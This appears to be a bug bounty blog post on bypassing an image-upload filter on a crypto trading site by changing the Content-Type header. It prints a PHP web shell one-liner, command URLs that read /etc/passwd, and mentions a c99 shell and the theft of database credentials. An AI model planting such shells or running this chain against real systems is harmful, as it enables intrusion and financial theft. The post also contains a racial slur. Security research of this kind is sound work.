Uploading Backdoor For Fun And Profit.
Hi folks,
After a long time decided to share something to gain knowledge.
The website was a crypto trading platform and i was looking for P1. For those who always worry to find P1's, here are few things you should look at.
Chaining of bugs + Impact to whole application/server + Difficult to Exploit? Make it easily exploitable ;)
Here is the one to learn single click exploits https://vulnerabilities.in/blog/
Logging into the application have functionality “File Upload” If i want to find RCE the first thing comes to my mind is to play with file upload functionality. There are many other ways to find RCE.
This will be helpful https://medium.com/@ozguralp/simple-remote-code-execution-vulnerability-examples-for-beginners-985867878311
Let’s direct to the POC — Application allows users to upload only image files, i tried uploading html, php files but i was restricted to upload such files.
Then what? Lets Bypass..
I tried changing file type .php to phps, phpt, php3, php4, php5, php.jpg etc.. and also tried Googling for “file upload bypasses hackerone” and learned very good reports, then a thought comes to my mind “how images are getting validated?”
I saw content-disposition and content-type headers while uploading files.
I tried playing with these headers, removed both content-disposition and content-type headers to check if these are checking at server side.
Yes! it was checking at server side and i was not able to upload images without content headers.
To be professional we should learn how things are working. “first learn it then break it” with this thought i started learning things from OWASP file upload bypasses https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload and the bypass was available in OWASP sheet.
Tried uploading png > Captured request with burp > Changed Content-Type: image/png to Content-Type: text/html
The content-type header was checking at server side but there was no header validation so i was able to bypass file upload functionality.
Checking — if http request comes with these headers.
validation — what value should come with these headers.
File Upload? Bypassed..!! RCE? Let’s see…
Uploaded php file with code inside <?php phpinfo(); ?> (php file upload > right click > view image > phpinfo page) — Remote Code Execution!
Now Uploaded php file with code inside <?php echo system($_GET["cmd"]); ?> (php file upload > right click > view image > https://TargetSite.com/logo/216.php > added ?cmd=whoami; id; uname -a > https://TargetSite.com/logo/216.php?cmd=whoami; id; uname -a)
when i tried to look /etc/passwd file, i was getting a blank page in response. (https://TargerSite.com/logo/216.php?cmd=cat /etc/passwd > blank page). Don’t know why i was not able to read /etc/passwd file.
Thanks to this nigga Muhammad Khizer Javed for this blog https://blog.securitybreached.org/2017/12/19/unrestricted-file-upload-to-rce-bug-bounty-poc/
While reading his blog i saw ‘+’ after “cat command” and then able to see /etc/passwd file.
https://TargetSite.com/logo/216.php?cmd=cat+/etc/passwd > Bingo!
Done? No! Explore more…
Looking at the file shows ‘MySQLServer’ is running behind, thought to try something fishy!
Uploaded c99 shell and found many sensitive files. Here is the one…
Now logged in to database with credentials > found my account in users table > Able to add BTC’s to my account.
Added BTC? No! Reported? Yes! Rewarded? Yes! :) But..
I heard saying people “RCE is not a direct vulnerability, it is the end result of a vulnerability”
But to be clear, Remote code Execution is not the end, if you finds RCE in bug bounty program then first think what you can do with it.
Example : As this was a crypto trading platform, found db-credential > logged in to database > found myself in users table > able to add a lot of BTC’s to my account. P1 ¯\_(ツ)_/¯
Also after “Remote Code Execution” we can go for “Privilege Escalation” which will be helpful for further exploitation. but..
Note : Before proceeding for further exploitation first read the programs policy, if you are allowed to do further exploitation then go for it or else submit a request and take approval and then ./exploit 😎
Here are 2 good blogs for learning privilege escalation techniques. https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
In my next upcoming blog i will try to write about “Rooting Server and gaining more privileges after RCE”.
